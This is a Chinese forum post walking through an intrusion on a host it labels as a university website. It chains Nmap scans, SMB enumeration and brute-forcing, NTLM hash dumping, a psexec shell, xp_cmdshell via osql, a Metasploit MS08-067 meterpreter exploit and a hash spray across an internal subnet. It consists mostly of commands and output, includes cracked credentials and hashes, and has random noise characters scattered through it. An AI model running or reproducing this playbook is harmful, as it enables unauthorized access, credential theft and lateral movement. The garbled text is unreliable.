广西师范网站http://202.103.242.241/% ^7 Z8 f R8 [
3 w5 W& {0 |# O6 I2 T" k: I- oroot@bt:~# nmap -sS -sV 202.103.242.241. W" X* I) o# W* u1 I% m# k6 Q
6 k. m, k' @1 pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 X5 C. P! F- w" V) x4 f% c
- R- _, r6 h1 |3 }
Nmap scan report for bogon (202.103.242.241)
' a \$ S U9 d, |( T3 C. F8 l7 m0 z" d$ M
Host is up (0.00048s latency).
1 ]$ |3 I1 b5 y+ O( M! ~! l: U2 P5 A: g- T' \) ?0 Z; H
Not shown: 993 closed ports
5 @7 g, r3 Q3 G& q, N ?" p9 O/ `/ h
PORT STATE SERVICE VERSION
: U; q2 u/ u9 M( k V8 b$ i* _9 E9 }! o% }# g( k& W$ [
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! y2 i1 v1 I- X/ I; Y, m, A
9 R* k% r8 r7 t) L0 @$ ?: V
139/tcp open netbios-ssn/ L5 D: d8 z( i! r! l' Z5 _
) `) ^7 e' P9 F4 \
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
8 o" A) J- ~4 X t# M0 n: g# }% `: i" i# R: q+ j* Y
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
4 t1 ]- T5 y1 D
U9 P9 |, U4 H2 f. z8 @' ?3 n3 o( y1026/tcp open msrpc Microsoft Windows RPC
/ \; x/ q* h( g, W: S+ u
# ^8 A. x/ {& y4 L/ ~+ z. p3372/tcp open msdtc?
0 w' e2 G3 {) g0 x1 \
) h! l' N# I# M! q0 r+ { S! C3389/tcp open ms-term-serv?# p9 S3 K' o9 _. ?& N% S
7 g$ z/ C0 e6 R2 H5 E6 x1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :2 Z# z# N4 A1 m$ v9 `. |, S
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
6 x& [: A+ |: u1 N* }% z) @& J$ G8 M9 ^. Q
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
1 U9 ~7 o! ?; Z! y. y t) c$ j% }
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)8 n% d: i- ^1 z$ o E) I! x
4 y( Y6 ^# B5 \/ ?6 z- l
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
9 @' D. }# G' I6 F
- [0 y, c; N' F- oSF:ptions,6,”hO\n\x000Z”);
: _* B! z% D& h3 B+ G" \
: H" [0 r% H' w1 r2 J" h, mMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" {) P1 v/ v; E6 {3 C
# [- F& ^ s4 RService Info: OS: Windows7 w( n. q- C% ^5 b
) ]: _# p7 K7 P' p; I a/ QService detection performed. Please report any incorrect results at http://nmap.org/submit/ .1 D. l* f9 K0 q( [: A
7 y7 ~6 P) i8 L$ i6 wNmap done: 1 IP address (1 host up) scanned in 79.12 seconds- J& \1 V6 k3 r; \2 n; o) o- `
6 U' `) Q n; |% g9 A* o& X# v4 o
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本, X2 \# J* \# Y5 q, \
- O& f& Q5 {$ J-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
7 a. K7 t: Z, y9 O" e/ D- K6 p0 ]$ Y
9 c" m0 c5 x7 Q% d6 d-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 K2 r6 U7 k; _4 N2 G
; b" x# r# d( X& Q( L0 E-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse o: I8 |, _9 h2 l' w. r5 y+ l
* k) F% ]' }5 o1 I2 {
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
; e4 g) j- j& N$ H& \; q1 Z/ H
8 v+ U W+ N: {6 G" C3 A# l9 D-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
, Q* ^' w4 W+ Z. O B
( W, @0 u. W" y8 j/ A* k-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
- D( H' U9 e3 p
9 }" X6 {& t6 a# [$ M-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse3 \0 z- j7 N6 A+ v
- D$ k5 m: W& j1 d5 g. ]
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
5 {1 `6 D7 a, z4 s- V6 H3 f @4 j0 u `( H/ r
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
6 C5 k! L# |, G8 t- z; @
7 } q3 j. P( _5 X-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
& S# w, d( R2 o
' o0 N/ l: I8 o+ _- |-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse" \) y2 C( W' H2 i/ b- z6 N
! E' A: b. d1 T; x+ b" _3 X3 U- ~
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse) r9 V+ O: P) N
2 q- t, f) w# Z$ _4 X% f+ V- A0 l
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse, Z0 M% y' Y G* ]/ Y0 w
( S. _/ z/ d* _0 P8 [1 I' p' ~
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
, s+ H4 t' ]1 H* g9 S: o% n6 d4 O; i: t3 s: c3 Z8 ^/ A
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse" M* l0 m- n4 k3 C
- i/ p; U$ o+ \- Z8 Rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 1 S9 r, i4 A7 x! U/ i
1 Z& `# P' R* k//此乃使用脚本扫描远程机器所存在的账户名+ R; C- k2 r. G3 C2 D$ ^4 W
3 ?& P- ^! _ |7 V9 ]Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST0 K" c5 _ g: F; U B1 a3 h8 W: F
5 _6 g7 M4 X! a( C4 K2 w. pNmap scan report for bogon (202.103.242.241)
8 ]: d7 Q5 r7 a) u2 x6 u! P, |
. ~$ M! v. q. A$ c8 a1 DHost is up (0.00038s latency).
+ E/ I! [$ _( B* K
, s# s7 }0 \( S( V' MNot shown: 993 closed ports
" e: X& H* T# ]0 n4 ]7 s" W# |( ^( \# k! C8 s
PORT STATE SERVICE; O) T' |7 C5 ] C- n
X/ Y: l+ v/ u0 f135/tcp open msrpc
1 C l1 c- t, x" f+ a: N3 T9 e* j
7 z$ J2 c! l* V139/tcp open netbios-ssn
7 c. d4 a+ Q9 O( q0 p' w$ N1 M: |6 N! L9 l8 T
445/tcp open microsoft-ds1 |0 K) U$ ?. I% l- Y4 b
+ o& c) l- O0 B5 X4 G$ C6 ^9 b, ?6 t
1025/tcp open NFS-or-IIS
* x! E/ h: c5 h3 a
4 E4 k1 q8 `, D; s" C1026/tcp open LSA-or-nterm
* ?. [) O3 a+ I# k* l9 z+ z& z( g6 d$ M% N
3372/tcp open msdtc
8 ?! Z M1 m: h# {8 o( T# t4 k
6 z! p4 C$ q3 y7 C3389/tcp open ms-term-serv' I1 z! m5 T: ?
. `+ [% Q: ^ I+ u# ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) a( _" f. {* r' F4 _
) h3 b* T+ ~# M) v3 H! _
Host script results:% f- C6 n5 p" R" W! G+ M2 b) x
5 ?: E, L: c; E6 `1 c. K3 u* k
| smb-enum-users:- ~& _" M. ~6 x* n6 X
) e$ d) f: r5 g
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
* z% ]( p+ A; e& j4 N- [
& q" i: K! L0 Z- H) v- K. K+ d# MNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
B8 n# A3 g. K- Z1 z0 t' _
( H/ q0 D p$ |3 Broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 1 W k2 i& |' n" {8 C
: u; {) Y( G# ?6 D( P5 v
//查看共享
$ _6 ~' K. l. W) F7 d$ Q g+ M
# W7 t1 A" N2 O5 p* `* `; G3 I- RStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
. j; ?/ X" a( S0 l6 y5 F( s: F9 k4 ?; w+ ]
Nmap scan report for bogon (202.103.242.241)- ]& {9 p2 a7 E. {' E
$ p# c; `! u; I2 d0 B" Y$ }9 MHost is up (0.00035s latency).2 {' V& Z' g4 E7 E' @
3 U7 k: f4 N2 a7 K* d$ GNot shown: 993 closed ports
) n4 E3 n7 o# m6 p1 R
1 b* Y$ ?5 f L! `5 QPORT STATE SERVICE
" l# ^4 \. W& A' T+ o; Y2 x. q9 D8 J8 u) o
135/tcp open msrpc# L; [9 T0 p9 L- A6 u; }
9 l; b0 [5 \8 m139/tcp open netbios-ssn, W+ Z) Q9 W- g6 _$ O1 d1 e: K R
6 Q( F) _* Q- a9 y: b# F
445/tcp open microsoft-ds
" J+ L7 P4 _; Q$ }* A/ B
- |1 {/ n5 C) w* N, f- j1 c }, X) {1025/tcp open NFS-or-IIS
6 D' M! B7 c1 ]' I+ V& E v N0 V2 D6 b
1026/tcp open LSA-or-nterm
: E7 |. l' Y# g4 O3 v3 V; G6 V% M- {3 R& j- R* I, i% I( ^' A
3372/tcp open msdtc: w* b9 H' X2 l9 z& k& ~6 N) z
' l6 K: I, ]3 ?, V6 ?! r
3389/tcp open ms-term-serv# N# i9 e. f0 [$ w
1 x8 L% U D: e9 W5 OMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ s1 q7 D( W8 l" c' p9 A
. H$ A- p( L; ?
Host script results:6 a6 [ X: z% U# N) g3 @, B7 q
# n* |( \1 X1 N$ E+ L/ D' C9 y4 F7 i| smb-enum-shares:+ e' |! T3 G. L; k
& }8 h9 s, n0 h- W9 ~8 j8 k: T# I
| ADMIN$
9 I$ m5 `* {9 i% n/ C' L
7 v' D+ ?" n, ~7 X| Anonymous access: <none>
/ S" Y4 X5 C- {9 f- X& j( ~
/ B4 [$ Y1 ]) h5 `" Q( l| C$
% C" \/ A* p4 q1 L4 N
" c( q( A& x8 ]| Anonymous access: <none>& B: @0 g" e' x9 | Z. r- `
/ t. q( g( k- |" h+ z| IPC$
, L5 g8 E3 o1 |9 }% L1 k# Q9 H1 s/ Q
|_ Anonymous access: READ
1 _% T6 B* J) ^! h) }9 I1 |! o! U a7 b; m' O
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
# z' {4 ]& G5 v& G/ p' M# t9 e5 k3 t: }7 {3 w2 E
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
Z7 I, Q& P7 p% {3 V' }! [1 A* q4 q0 ~( F; b
//获取用户密码
. k3 q+ x0 ]0 ~( e8 p; D. x* D. Z: G8 \- n8 H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST0 Y: A8 c$ x+ B/ f& K
$ | m& L: z2 z
Nmap scan report for bogon (202.103.242.2418)' r0 T l7 C5 D; ~# M: U2 ?2 A& L
9 g, D9 q9 s1 Q
Host is up (0.00041s latency).- l/ O& h2 V; s0 L0 M) u% R
, G, [& C2 u8 y% _2 `3 VNot shown: 993 closed ports
) k& [! r/ D! p9 Z, b2 z4 J
/ T+ m' h* u9 S VPORT STATE SERVICE
- a! P: w$ ]0 S7 K4 w
& j7 L$ ?- L( | t! Z135/tcp open msrpc
: P7 u' x% b4 {% O' y
# R& ?! l6 \% [6 ], G139/tcp open netbios-ssn, E! P/ D2 F* T. k5 L( `$ S% J( h2 G
1 K0 y$ `" R3 X' Q1 m/ A445/tcp open microsoft-ds
3 o& g: c- W8 N6 R
/ h0 K& D1 L, ]+ W+ ]1025/tcp open NFS-or-IIS' _ q* r, W& f# u0 }8 w- o6 M: F: d, u
: J# W" ~6 |2 A2 Y1026/tcp open LSA-or-nterm5 ?$ {3 _' r* O
* B, o' y; ]2 F5 F- V; u3372/tcp open msdtc
! |$ F0 S% s( X/ M0 ?, E( D% j7 h' E) ]1 P4 w
3389/tcp open ms-term-serv
) n" R C1 W' z# @9 U3 {2 \
& C8 H) ]7 U4 wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( V" n8 r$ I0 s! q8 e5 J) T' |8 v* W) x7 Z2 r3 A: N
Host script results:- ^. I7 y: t7 @( Q7 {+ k
3 h1 [: [( j d* X" x! Q$ y# }3 f| smb-brute:6 o1 P' J% L3 J
; N5 o; l, \- j: |$ ~administrator:<blank> => Login was successful, Q# G- h0 J5 j+ `7 P( a
, z. ]2 l7 S/ ?* m
|_ test:123456 => Login was successful" @, g' M! J. y) W( x# L/ p
4 l6 S( o: L4 `Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 q' t: A- I5 R0 j+ I6 {
3 P9 c9 g9 y5 ~" Jroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
& \4 U: H0 f$ {, q( _- A0 D! a+ C- \) x+ _( r7 [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
2 [: ?% P4 M6 D* V: h* C# O% w0 c; u' e0 r( V- c
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
" r7 d, C; N; g0 u, d/ d% ~9 o5 T5 a, b; f2 E* ~
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
) L6 F0 b2 C; A+ ?6 o: c; |
0 Q$ c# q F) \6 B. vStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
4 z4 Y( m$ S) p7 M4 }8 M4 ]# c- Y9 b; c- Q# `6 {
Nmap scan report for bogon (202.103.242.241)
3 Z' f) @ x$ n* O, V* v. k5 [: j% B! [1 E/ L
Host is up (0.0012s latency).3 C4 f1 o( B: D6 S5 @
9 E f* [6 M7 U# O5 Q
PORT STATE SERVICE
( }3 I7 ~/ W' ^* r6 l# U4 {; E
/ L8 Y+ |* m8 d2 S135/tcp open msrpc: t% e _' E/ j" j9 y9 P/ w/ H* d
4 n5 W4 c# L" Z7 n" u7 R6 `139/tcp open netbios-ssn9 y1 }( o4 N2 h, Y" @( \7 V3 G
' D& p2 E# K8 E' ]445/tcp open microsoft-ds+ n% E6 Y0 L- U
0 Q" e; C' u: w+ d6 R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 G# W' t1 J( L F$ \3 g
7 E' N6 O6 A8 [6 a6 e( A9 Q6 THost script results:' x+ B/ g" S4 x' K! G- Q6 l* D
9 ~6 h- ], F* R Y9 p4 A& N! a
| smb-pwdump:) F$ r' H% g/ Y5 v
8 g$ e- r5 i: O* z/ s) f0 N| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 p5 j$ e8 |/ ?8 Z6 \- n Q% `
1 g7 E, X! v% G3 r7 k
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
; L/ _" u6 n) B
3 @: N9 n) w* f: `" A+ n( \) p! i| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
( ~ c8 k1 Y/ r U. |# ^$ E* u- ^# e9 z$ ?
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2, X4 s. Y) ?9 P/ a& ?" o. |
% c5 i3 z5 V, _+ D% F L) m8 g
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
6 P0 P2 B5 W% a L# u+ l/ ?; a% X L9 i. v! f5 j, m/ _
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
) P& d7 Z; u( f3 {, R* r8 ?* x% |' O, Y' L% _: i9 R8 ~' M ?
-p 123456 -e cmd.exe9 K) J; c5 Z' L% h
- q5 \. E$ ?7 p# n7 J
PsExec v1.55 – Execute processes remotely$ ~* Y) m9 a* e& I
% L" H. p& G* f eCopyright (C) 2001-2004 Mark Russinovich
( ~+ M; a1 s) V' F7 @, d1 l5 v, z3 I; p0 j# Y7 B2 Z$ }9 U" ~
Sysinternals – www.sysinternals.com+ F* [# ]6 d) l7 r* x4 t+ a9 [
* s- J* F l J4 _0 A- F
Microsoft Windows 2000 [Version 5.00.2195] F5 C' E2 ~7 M" \/ g% p
/ v9 \. v7 t: o- z
(C) 版权所有 1985-2000 Microsoft Corp.4 u; ?' W4 A7 p4 u& g9 Q: A
4 ^8 [2 Y: W. b1 Z$ i
C:\WINNT\system32>ipconfig+ N; m/ S% R: [! z! A1 O
- D' @( ~" X3 G, ]8 Y# ~1 H! @
Windows 2000 IP Configuration2 @3 a: K0 o0 X9 z3 a! S
7 c( B! V: Q/ u9 U' s8 s `Ethernet adapter 本地连接:9 \3 Z. g% n8 w: Z, O* J
w' e* C7 S; y1 j7 tConnection-specific DNS Suffix . :
' {" p, o# W Q# _) V/ @, w) y6 [; r
IP Address. . . . . . . . . . . . : 202.103.242.241
: B; s; Y; u, ~3 z; _" P2 Z& \7 u2 ?6 i7 a
Subnet Mask . . . . . . . . . . . : 255.255.255.0
/ K! H4 P6 m' a8 g" F/ S5 E4 R. G) V; E
Default Gateway . . . . . . . . . : 202.103.1.1
1 w# s- n0 d7 e8 v1 v7 A! C
3 z" L( C+ _/ ?. XC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
4 J9 n# @( X) u6 G- m$ w/ | s
. F' g1 ]* s/ g( i% ?5 @" P+ ]& k! X$ aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
7 P1 C( x" X. q/ U `% u: y! n
. L. B% u0 O6 B B& ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST' P6 f, U% H3 }
* P$ ~" ^4 _+ H0 G8 c+ N% _
Nmap scan report for bogon (202.103.242.241)
: P8 n6 Z0 `( F0 L
6 \- f6 q% V# G# s, K2 W, kHost is up (0.00046s latency).
5 X6 y/ b3 [; k' o: {4 R9 {1 s+ ~% e( a- Y. h5 ~ E d9 o
Not shown: 993 closed ports( p% h, o2 Z; d6 ~# `! t
T0 Q X5 g# L8 y# N9 Q
PORT STATE SERVICE7 `% w: U P! T! O) ?" N
% C; f5 ~4 u$ `) k% f
135/tcp open msrpc# @" c+ l/ ]* e% Q* ^8 w+ A
( X- ^* R" M7 ?
139/tcp open netbios-ssn2 U, q) w# F6 Y- _3 W; h% B |) Z
9 }# d2 R/ `) N$ g) S) i
445/tcp open microsoft-ds2 T6 Q( [0 x" V/ c+ r8 Y
9 d2 p- o$ ~ N1025/tcp open NFS-or-IIS
: q; y, a$ g( O; D' Z- V4 Z6 p2 y- _0 y& B4 b
1026/tcp open LSA-or-nterm, t6 H- W2 D& `1 q# s2 y4 I; H; k
8 R# N( E- N3 b8 e% f4 F3372/tcp open msdtc
" |- W2 Z9 }9 A2 f0 ^, m) w0 N2 x9 v2 R# c! N
3389/tcp open ms-term-serv
0 x* _& T; g; G) G% a* i
# a" \' F* n; p0 DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% Z. d& u- S8 q: G( ?& W
) y, j6 j6 z8 G- ^* [- z ]
Host script results:& ?1 i& u& C3 v( x0 R" y' a _
9 j! P- r8 ?2 E1 l2 k
| smb-check-vulns:
! i8 {. N* S, V1 I
3 B: R: X7 H. Q; S( L|_ MS08-067: VULNERABLE: S% Q2 R! n6 G! w6 Y, z% y8 _3 \. Q! `
! b. X+ x/ u h4 G4 g. i$ ]
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
! B/ r: x( z/ b0 l; I$ q# b% \2 V: ~# C5 N& r$ V9 s3 c- s8 D
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
) [0 N" K6 l/ M6 n: E
- d9 f7 b# ]& j$ g7 v9 nmsf > search ms08; g6 }1 g7 F& C7 a. q& k
& O f6 u0 w+ H' amsf > use exploit/windows/smb/ms08_067_netapi0 f' b& M! T: q9 L0 ^: U, S# F1 l
* p; m) o- K& m' O) V! j. ymsf exploit(ms08_067_netapi) > show options
- d) O- e& M8 r& f' g* a b% i" e @) A8 @/ O9 j
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241/ x# U6 Y/ b) k% m$ V
) b6 W5 I; Y" V/ U8 ~! D" K1 D9 Vmsf exploit(ms08_067_netapi) > show payloads
) q7 J1 V0 |- r- X c, y: ~% y1 @2 N D" h% R
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp N/ N" D6 \$ T! c/ g3 u/ ]4 ~
1 j$ `& Z7 M) Zmsf exploit(ms08_067_netapi) > exploit2 @* m, V4 Y% m! r% l8 ? @
1 W) [; v4 _- n" F/ _5 a+ ?$ Q; V* T
meterpreter >
; S" m2 _+ W0 D1 [9 o
- v. ?. F( N; y+ c: B9 iBackground session 2? [y/N] (ctrl+z)
& [8 ~: K9 e! i" o( U
0 R$ Y' j$ Y8 C0 G8 @% fmsf exploit(ms08_067_netapi) > sessions -l- L+ p. ]4 l5 c* k0 g
; Z, \# V" s: A# l9 n
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
9 C; {1 I( E4 r2 W: T/ c
( |: R* J5 r% D: n& c& b; T+ n( Rtest
" {0 E, t' {3 C0 Y
& \( e: R# u: I( y0 Iadministrator
3 e' g: {5 D6 m- H( ^3 _" {* i+ B0 H1 H$ t6 o# T
root@bt:/usr/local/share/nmap/scripts# vim password.txt `3 z( f4 E7 Y6 ^
8 V7 d% T0 P& w6 Y+ v0 \% u44EFCE164AB921CAAAD3B435B51404EE
6 ?" [: ^2 f* x- F$ r; B- X" R8 x: z: r7 J, r ~4 I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
# }" z3 }! G- l3 T
* x" ~0 o* t- G //利用用户名跟获取的hash尝试对整段内网进行登录0 |# v4 T9 J% F+ {
A0 m% a. [, |* ~7 ~9 {/ m6 |Nmap scan report for 192.168.1.1055 Q. S4 M4 \- V
$ y' s: s9 r" Y" `7 |% v) FHost is up (0.00088s latency).
5 O; { J5 ^% V/ \/ R
* e9 F1 V3 i3 x* zNot shown: 993 closed ports, a/ j8 k+ E2 N+ i& e
/ Z' u3 y+ m- Z( q# K
PORT STATE SERVICE
- C- b' L# c- S0 Z. e' r& `- W/ O
; r e( l/ @, Q2 b' R8 i, R8 @135/tcp open msrpc. H! |6 `5 J! d
; P9 K# R2 G/ `8 W: G% s
139/tcp open netbios-ssn
: ^/ r1 ^7 L) \7 x8 H u+ c" A+ l
445/tcp open microsoft-ds' A5 ^- o& x5 x, f+ c; B) l- q3 M
; h' ^- w2 H( d
1025/tcp open NFS-or-IIS
7 f2 _/ ?; ^5 \3 y* H& V; T/ T; j8 @4 j2 ^* f9 s8 s
1026/tcp open LSA-or-nterm9 I% @1 O r' k( d: Z
' s, x/ T @$ _2 j, _7 P" | Q
3372/tcp open msdtc
# `' R) M) i& q T" ~6 a: y8 ~2 ]7 r2 X+ h1 q
3389/tcp open ms-term-serv
& m3 o [0 Y! B, f
' E1 l9 Z% u0 o LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ J% C( i: e: h0 t, O1 [
' ~% \2 o" J% X8 V2 s9 H4 b4 \Host script results:
% o8 z" _' O( w6 g3 H" x0 o. k( R! V' ~. u; W5 W
| smb-brute:
- H9 S! A' z/ J) H, E- ?' R( _6 H$ n- D, ] j( e( {3 E
|_ administrator:<blank> => Login was successful+ z$ {0 K3 b7 h+ f+ {- n3 }
* H; ^+ H4 r: s" o6 h7 ]
攻击成功,一个简单的msf+nmap攻击~~·) n6 l8 G+ W7 p9 K
* s. N( t7 Y" F% B% r+ ^
|
发表于 2012-12-4 12:46:42
收藏
支持
反对